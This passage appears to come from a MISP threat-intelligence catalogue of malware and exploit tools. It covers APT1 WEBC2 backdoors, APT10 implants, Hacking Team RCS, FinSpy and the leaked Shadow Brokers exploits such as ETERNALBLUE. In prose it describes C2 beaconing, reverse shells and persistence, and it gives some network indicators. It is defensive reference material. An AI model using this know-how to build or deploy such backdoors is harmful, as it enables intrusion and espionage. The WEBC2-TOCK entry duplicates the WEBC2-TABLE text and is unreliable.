The NEWSREELS malware family is an HTTP based backdoor. When first started, NEWSREELS decodes two strings from its resources section. These strings are both used as C2 channels, one URL is used as a beacon URL (transmitting) and the second URL is used to get commands (receiving). The NEWSREELS malware family is capable of performing file uploads, downloads, creating processes or creating an interactive reverse shell.

The tag is: misp-galaxy:tool="NEWSREELS"

NEWSREELS has relationships with:

  • similar: misp-galaxy:malpedia="NewsReels" with estimative-language:likelihood-probability="almost-certain"

Table 16466. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

SEASALT

The SEASALT malware family communicates via a custom binary protocol. It is capable of gathering some basic system information, file system manipulation, file upload and download, process creation and termination, and spawning an interactive reverse shell. The malware maintains persistence by installing itself as a service.

The tag is: misp-galaxy:tool="SEASALT"

SEASALT has relationships with:

  • similar: misp-galaxy:malpedia="SeaSalt" with estimative-language:likelihood-probability="almost-certain"

Table 16467. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

STARSYPOUND

STARSYPOUND provides an interactive remote shell over an obfuscated communications channel. When it is first run, it loads a string (from the executable PE resource section) containing the beacon IP address and port. The malware sends the beacon string "(SY)# <HOSTNAME>" to the remote system, where <HOSTNAME> is the hostname of the victim system. The remote host responds with a packet that also begins with the string "(SY)# cmd". This causes the malware to launch a new cmd.exe child process. Further communications are forwarded to the cmd.exe child process to execute. The commands sent to the shell and their responses are obfuscated when sent over the network.

The tag is: misp-galaxy:tool="STARSYPOUND"

STARSYPOUND has relationships with:

  • similar: misp-galaxy:malpedia="StarsyPound" with estimative-language:likelihood-probability="almost-certain"

Table 16468. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

SWORD

This family of malware provides a backdoor over the network to the attackers. It is configured to connect to a single host and offers file download over HTTP, program execution, and arbitrary execution of commands through a cmd.exe instance.

The tag is: misp-galaxy:tool="SWORD"

SWORD has relationships with:

  • similar: misp-galaxy:malpedia="Sword" with estimative-language:likelihood-probability="almost-certain"

Table 16469. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

TABMSGSQL

This malware family is a full-featured backdoor capable of file uploading and downloading, arbitrary execution of programs, and providing a remote interactive command shell. All communications with the C2 server are sent over HTTP to a static URL, appending various URL parameters to the request. Some variants use a slightly different URL.

The tag is: misp-galaxy:tool="TABMSGSQL"

TABMSGSQL is also known as:

  • TROJAN LETSGO

TABMSGSQL has relationships with:

  • similar: misp-galaxy:malpedia="TabMsgSQL" with estimative-language:likelihood-probability="almost-certain"

Table 16470. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

TARSIP-ECLIPSE

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-ECLIPSE family is distinguished by the presence of 'eclipse' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence.

The tag is: misp-galaxy:tool="TARSIP-ECLIPSE"

Table 16471. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

TARSIP-MOON

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-MOON family is distinguished by the presence of 'moon' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence.

The tag is: misp-galaxy:tool="TARSIP-MOON"

Table 16472. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WARP

The WARP malware family is an HTTP based backdoor written in C++, and the majority of its code base is borrowed from source code available in the public domain. Network communications are implemented using the same WWW client library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html. The malware has system survey functionality (collects hostname, current user, system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available from www.bo2k.com. It also contains the hard disk identification code found at www.winsim.com/diskid32/diskid32.cpp. When the WARP executing remote commands, the malware creates a copy of the ?%SYSTEMROOT%\system32\cmd.exe? file as '%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the duplicate executable is zeroed out. Some WARP variants maintain persistence through the use of DLL search order hijacking.

The tag is: misp-galaxy:tool="WARP"

Table 16473. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-ADSPACE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is capable of downloading and executing a file. All variants represented here are the same file with different MD5 signatures. This malware attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for commands inside a set of HTML tags, part of which are in the File Strings indicator term below.

The tag is: misp-galaxy:tool="WEBC2-ADSPACE"

WEBC2-ADSPACE has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-AdSpace" with estimative-language:likelihood-probability="almost-certain"

Table 16474. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-AUSOV

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware family is a only a downloader which operates over the HTTP protocol with a hard-coded URL. If directed, it has the capability to download, decompress, and execute compressed binaries.

The tag is: misp-galaxy:tool="WEBC2-AUSOV"

WEBC2-AUSOV has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Ausov" with estimative-language:likelihood-probability="almost-certain"

Table 16475. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-BOLID

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.

The tag is: misp-galaxy:tool="WEBC2-BOLID"

WEBC2-BOLID has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Bolid" with estimative-language:likelihood-probability="almost-certain"

Table 16476. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-CLOVER

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The family of malware provides the attacker with an interactive command shell, the ability to upload and download files, execute commands on the system, list processes and DLLs, kill processes, and ping hosts on the local network. Responses to these commands are encrypted and compressed before being POSTed to the server. Some variants copy cmd.exe to Updatasched.exe in a temporary directory, and then may launch that in a process if an interactive shell is called. On initial invocation, the malware also attempts to delete previous copies of the Updatasched.exe file.

The tag is: misp-galaxy:tool="WEBC2-CLOVER"

Table 16477. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-CSON

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware act only as downloaders and droppers for other malware. They communicate with a hard-coded C2 server, reading commands embedded in HTML comment fields. Some variants are executables which act upon execution, others are DLLs which can be attached to services or loaded through search order hijacking.

The tag is: misp-galaxy:tool="WEBC2-CSON"

WEBC2-CSON has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Cson" with estimative-language:likelihood-probability="almost-certain"

Table 16478. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-DIV

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-DIV variant searches for the strings "div safe:" and " balance" to delimit encoded C2 information. If the decoded string begins with the letter "J" the malware will parse additional arguments in the decoded string to specify the sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading and executing a file, or sleeping a specified interval.

The tag is: misp-galaxy:tool="WEBC2-DIV"

WEBC2-DIV has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-DIV" with estimative-language:likelihood-probability="almost-certain"

Table 16479. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-GREENCAT

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware is a variant on the GREENCAT family, using a fixed web C2. This family is a full featured backdoor which provides remote command execution, file transfer, process and service enumeration and manipulation. It installs itself persistently through the current user’s registry Run key.

The tag is: misp-galaxy:tool="WEBC2-GREENCAT"

WEBC2-GREENCAT has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-GreenCat" with estimative-language:likelihood-probability="almost-certain"

Table 16480. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-HEAD

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-HEAD variant communicates over HTTPS, using the system’s SSL implementation to encrypt all communications with the C2 server. WEBC2-HEAD first issues an HTTP GET to the host, sending the Base64-encoded string containing the name of the compromised machine running the malware.

The tag is: misp-galaxy:tool="WEBC2-HEAD"

WEBC2-HEAD has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Head" with estimative-language:likelihood-probability="almost-certain"

Table 16481. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-KT3

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-KT3 variant searches for commands in a specific comment tag. Network traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity.

The tag is: misp-galaxy:tool="WEBC2-KT3"

WEBC2-KT3 has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Kt3" with estimative-language:likelihood-probability="almost-certain"

Table 16482. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-QBP

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-QBP variant will search for two strings in a HTML comment. The first will be "2010QBP " followed by " 2010QBP//--". Inside these tags will be a DES-encrypted string.

The tag is: misp-galaxy:tool="WEBC2-QBP"

WEBC2-QBP has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Qbp" with estimative-language:likelihood-probability="almost-certain"

Table 16483. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-RAVE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware will set itself up as a service and connect out to a hardcoded web page and read a modified base64 string from this webpage. The later versions of this malware supports three commands (earlier ones are just downloaders or reverse shells). The first commands will sleep the malware for N number of hours. The second command will download a binary from the encoded HTML comment and execute it on the infected host. The third will spawn an encoded reverse shell to an attacker specified location and port.

The tag is: misp-galaxy:tool="WEBC2-RAVE"

WEBC2-RAVE has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Rave" with estimative-language:likelihood-probability="almost-certain"

Table 16484. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-TABLE

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

The tag is: misp-galaxy:tool="WEBC2-TABLE"

WEBC2-TABLE has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Table" with estimative-language:likelihood-probability="almost-certain"

Table 16485. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-TOCK

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

The tag is: misp-galaxy:tool="WEBC2-TOCK"

Table 16486. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-UGX

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware provide remote command shell and remote file download and execution capabilities. The malware downloads a web page containing a crafted HTML comment that subsequently contains an encoded command. The contents of this command tell the malware whether to download and execute a program, launch a reverse shell to a specific host and port number, or to sleep for a period of time.

The tag is: misp-galaxy:tool="WEBC2-UGX"

WEBC2-UGX has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-UGX" with estimative-language:likelihood-probability="almost-certain"

Table 16487. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-Y21K

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of backdoor malware talk to specific Web-based Command & Control (C2) servers. The backdoor has a limited command set, depending on version. It is primarily a downloader, but it classified as a backdoor because it can accept a limited command set, including changing local directories, downloading and executing additional files, sleeping, and connecting to a specific IP & port not initially included in the instruction set for the malware. Each version of the malware has at least one hardcoded URL to which it connects to receive its initial commands. This family of malware installs itself as a service, with the malware either being the executable run by the service, or the service DLL loaded by a legitimate service. The same core code is seen recompiled on different dates or with different names, but the same functionality. Key signatures include a specific set of functions (some of which can be used with the OS-provided rundll32.exe tool to install the malware as a service), and hardcoded strings used in communication with C2 servers to issue commands to the implant.

The tag is: misp-galaxy:tool="WEBC2-Y21K"

Table 16488. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-YAHOO

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to download a web page that may contain an encoded URL. The encoded URL will be found in the pages returned inside an attribute named 'sb' or 'ex' within a tag named 'yahoo'. The embedded link can direct the malware to download and execute files.

The tag is: misp-galaxy:tool="WEBC2-YAHOO"

WEBC2-YAHOO has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Yahoo" with estimative-language:likelihood-probability="almost-certain"

Table 16489. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

HAYMAKER

HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string.

The tag is: misp-galaxy:tool="HAYMAKER"

HAYMAKER has relationships with:

  • similar: misp-galaxy:mitre-malware="ChChes - S0144" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="ChChes" with estimative-language:likelihood-probability="likely"

Table 16490. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

BUGJUICE

BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell.

The tag is: misp-galaxy:tool="BUGJUICE"

BUGJUICE has relationships with:

  • similar: misp-galaxy:rat="RedLeaves" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

Table 16491. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

SNUGRIDE

SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell. Persistence is maintained through a Run registry key.

The tag is: misp-galaxy:tool="SNUGRIDE"

SNUGRIDE has relationships with:

  • similar: misp-galaxy:mitre-malware="SNUGRIDE - S0159" with estimative-language:likelihood-probability="likely"

Table 16492. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

QUASARRAT

QUASARRAT is an open-source RAT available at https://github.com/quasar/QuasarRat . The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past. QUASARRAT is a publicly available Windows backdoor. It may visit a website, download, upload, and execute files. QUASARRAT may acquire system information, act as a remote desktop or shell, or remotely activate the webcam. The backdoor may also log keystrokes and steal passwords from commonly used browsers and FTP clients. QUASARRAT was originally named xRAT before it was renamed by the developers in August 2015. Availability: Public

The tag is: misp-galaxy:tool="QUASARRAT"

QUASARRAT has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="likely"

Table 16493. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://researchcenter.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

da Vinci RCS

Hacking Team’s "DaVinci" Remote Control System is able, the company says, to break encryption and allow law enforcement agencies to monitor encrypted files and emails (even ones encrypted with PGP), Skype and other Voice over IP or chat communication. It allows identification of the target’s location and relationships. It can also remotely activate microphones and cameras on a computer and works worldwide. Hacking Team claims that its software is able to monitor hundreds of thousands of computers at once, all over the country. Trojans are available for Windows, Mac, Linux, iOS, Android, Symbian and Blackberry.

The tag is: misp-galaxy:tool="da Vinci RCS"

da Vinci RCS is also known as:

  • DaVinci

  • Morcut

Table 16494. Table References

Links

http://surveillance.rsf.org/en/hacking-team/

https://wikileaks.org/hackingteam/emails/fileid/581640/267803

https://wikileaks.org/hackingteam/emails/emailid/31436

LATENTBOT

LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

The tag is: misp-galaxy:tool="LATENTBOT"

LATENTBOT has relationships with:

  • similar: misp-galaxy:malpedia="LatentBot" with estimative-language:likelihood-probability="almost-certain"

Table 16495. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

The tag is: misp-galaxy:tool="FINSPY"

FINSPY is also known as:

  • BlackOasis

FINSPY has relationships with:

  • similar: misp-galaxy:rat="FINSPY" with estimative-language:likelihood-probability="likely"

Table 16496. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

RCS Galileo

HackingTeam Remote Control System (RCS) Galileo hacking platform

The tag is: misp-galaxy:tool="RCS Galileo"

Table 16497. Table References

Links

https://www.f-secure.com/documents/996508/1030745/callisto-group

EARLYSHOVEL

RedHat 7.0 - 7.1 Sendmail 8.11.x exploit

The tag is: misp-galaxy:tool="EARLYSHOVEL"

Table 16498. Table References

Links

https://github.com/misterch0c/shadowbroker

EBBISLAND (EBBSHAVE)

root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86

The tag is: misp-galaxy:tool="EBBISLAND (EBBSHAVE)"

Table 16499. Table References

Links

https://github.com/misterch0c/shadowbroker

ECHOWRECKER

remote Samba 3.0.x Linux exploit

The tag is: misp-galaxy:tool="ECHOWRECKER"

Table 16500. Table References

Links

https://github.com/misterch0c/shadowbroker

EASYBEE

appears to be an MDaemon email server vulnerability

The tag is: misp-galaxy:tool="EASYBEE"

Table 16501. Table References

Links

https://github.com/misterch0c/shadowbroker

EASYPI

an IBM Lotus Notes exploit that gets detected as Stuxnet

The tag is: misp-galaxy:tool="EASYPI"

Table 16502. Table References

Links

https://github.com/misterch0c/shadowbroker

EWOKFRENZY

an exploit for IBM Lotus Domino 6.5.4 & 7.0.2

The tag is: misp-galaxy:tool="EWOKFRENZY"

Table 16503. Table References

Links

https://github.com/misterch0c/shadowbroker

EXPLODINGCAN

an IIS 6.0 exploit that creates a remote backdoor

The tag is: misp-galaxy:tool="EXPLODINGCAN"

Table 16504. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALROMANCE

a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)

The tag is: misp-galaxy:tool="ETERNALROMANCE"

Table 16505. Table References

Links

https://github.com/misterch0c/shadowbroker

EDUCATEDSCHOLAR

a SMB exploit (MS09-050)

The tag is: misp-galaxy:tool="EDUCATEDSCHOLAR"

Table 16506. Table References

Links

https://github.com/misterch0c/shadowbroker

EMERALDTHREAD

a SMB exploit for Windows XP and Server 2003 (MS10-061)

The tag is: misp-galaxy:tool="EMERALDTHREAD"

Table 16507. Table References

Links

https://github.com/misterch0c/shadowbroker

EMPHASISMINE

a remote IMAP exploit for IBM Lotus Domino 6.6.4 to 8.5.2

The tag is: misp-galaxy:tool="EMPHASISMINE"

Table 16508. Table References

Links

https://github.com/misterch0c/shadowbroker

ENGLISHMANSDENTIST

Outlook Exchange WebAccess rules to trigger executable code on the client’s side to send an email to other users

The tag is: misp-galaxy:tool="ENGLISHMANSDENTIST"

Table 16509. Table References

Links

https://github.com/misterch0c/shadowbroker

EPICHERO

0-day exploit (RCE) for Avaya Call Server

The tag is: misp-galaxy:tool="EPICHERO"

Table 16510. Table References

Links

https://github.com/misterch0c/shadowbroker

ERRATICGOPHER

SMBv1 exploit targeting Windows XP and Server 2003

The tag is: misp-galaxy:tool="ERRATICGOPHER"

Table 16511. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALSYNERGY

a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)

The tag is: misp-galaxy:tool="ETERNALSYNERGY"

Table 16512. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALBLUE

SMBv2 exploit for Windows 7 SP1 (MS17-010)

The tag is: misp-galaxy:tool="ETERNALBLUE"

Table 16513. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALCHAMPION

a SMBv1 exploit

The tag is: misp-galaxy:tool="ETERNALCHAMPION"

Table 16514. Table References

Links

https://github.com/misterch0c/shadowbroker

ESKIMOROLL

Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers

The tag is: misp-galaxy:tool="ESKIMOROLL"

Table 16515. Table References

Links

https://github.com/misterch0c/shadowbroker

ESTEEMAUDIT

RDP exploit and backdoor for Windows Server 2003

The tag is: misp-galaxy:tool="ESTEEMAUDIT"

Table 16516. Table References

Links

https://github.com/misterch0c/shadowbroker

ECLIPSEDWING

RCE exploit for the Server service in Windows Server 2008 and later (MS08-067)

The tag is: misp-galaxy:tool="ECLIPSEDWING"

Table 16517. Table References

Links

https://github.com/misterch0c/shadowbroker

ETRE

exploit for IMail 8.10 to 8.22

The tag is: misp-galaxy:tool="ETRE"

Table 16518. Table References

Links

https://github.com/misterch0c/shadowbroker

FUZZBUNCH

an exploit framework, similar to MetaSploit

The tag is: misp-galaxy:tool="FUZZBUNCH"

Table 16519. Table References

Links

https://securelist.com/darkpulsar/88199/

https://github.com/misterch0c/shadowbroker

ODDJOB

implant builder and C&C server that can deliver exploits for Windows 2000 and later, also not detected by any AV vendors

The tag is: misp-galaxy:tool="ODDJOB"

ODDJOB has relationships with:

  • similar: misp-galaxy:malpedia="OddJob" with estimative-language:likelihood-probability="almost-certain"

Table 16520. Table References

Links

https://github.com/misterch0c/shadowbroker

PASSFREELY

utility which Bypasses authentication for Oracle servers

The tag is: misp-galaxy:tool="PASSFREELY"

Table 16521. Table References

Links

https://github.com/misterch0c/shadowbroker

SMBTOUCH

check if the target is vulnerable to samba exploits like ETERNALSYNERGY, ETERNALBLUE, ETERNALROMANCE

The tag is: misp-galaxy:tool="SMBTOUCH"

Table 16522. Table References

Links

https://github.com/misterch0c/shadowbroker

ERRATICGOPHERTOUCH

Check if the target is running some RPC

The tag is: misp-galaxy:tool="ERRATICGOPHERTOUCH"

Table 16523. Table References

Links

https://github.com/misterch0c/shadowbroker

IISTOUCH

check if the running IIS version is vulnerable

The tag is: misp-galaxy:tool="IISTOUCH"

Table 16524. Table References

Links

https://github.com/misterch0c/shadowbroker

RPCOUTCH

get info about windows via RPC

The tag is: misp-galaxy:tool="RPCOUTCH"

Table 16525. Table References

Links

https://github.com/misterch0c/shadowbroker

DOPU

used to connect to machines exploited by ETERNALCHAMPIONS

The tag is: misp-galaxy:tool="DOPU"

Table 16526. Table References

Links

https://github.com/misterch0c/shadowbroker

FlexSpy

covert surveillance tools

The tag is: misp-galaxy:tool="FlexSpy"

feodo

Unfortunately, it is time to meet 'Feodo'. Since august of this year when FireEye’s MPS devices detected this malware in the field, we have been monitoring this banking trojan very closely. In many ways, this malware looks similar to other famous banking trojans like Zbot and SpyEye. Although my analysis says that this malware is not a toolkit and is in the hands of a single criminal group.

The tag is: misp-galaxy:tool="feodo"

feodo has relationships with:

  • similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="almost-certain"

Table 16527. Table References

Links

https://www.fireeye.com/blog/threat-research/2010/10/feodosoff-a-new-botnet-on-the-rise.html

Cardinal RAT

Palo Alto Networks has discovered a previously unknown remote access Trojan (RAT) that has been active for over two years. It has a very low volume in this two-year period, totaling roughly 27 total samples. The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# (C Sharp) Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family. These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.

The tag is: misp-galaxy:tool="Cardinal RAT"

Cardinal RAT has relationships with:

  • similar: misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Cardinal RAT" with estimative-language:likelihood-probability="almost-certain"

Table 16528. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

REDLEAVES

The REDLEAVES implant consists of three parts: an executable, a loader, and the implant shellcode. The REDLEAVES implant is a remote administration Trojan (RAT) that is built in Visual C++ and makes heavy use of thread generation during its execution. The implant contains a number of functions typical of RATs, including system enumeration and creating a remote shell back to the C2.

The tag is: misp-galaxy:tool="REDLEAVES"

REDLEAVES has relationships with:

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="almost-certain"

Table 16529. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-117A

Kazuar

Kazuar is a fully featured backdoor written using the .NET Framework and obfuscated using the open source packer called ConfuserEx. Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign. The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan’s capabilities. During our analysis of this malware we uncovered interesting code paths and other artifacts that may indicate a Mac or Unix variant of this same tool also exists. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver. We suspect the Kazuar tool may be linked to the Turla threat actor group (also known as Uroburos and Snake), who have been reported to have compromised embassies, defense contractors, educational institutions, and research organizations across the globe. A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005. If the hypothesis is correct and the Turla threat group is using Kazuar, we believe they may be using it as a replacement for Carbon and its derivatives. Of the myriad of tools observed in use by Turla Carbon and its variants were typically deployed as a second stage backdoor within targeted environments and we believe Kazuar may now hold a similar role for Turla operations.

The tag is: misp-galaxy:tool="Kazuar"

Kazuar has relationships with:

  • similar: misp-galaxy:malpedia="Kazuar" with estimative-language:likelihood-probability="likely"

Table 16530. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Trick Bot

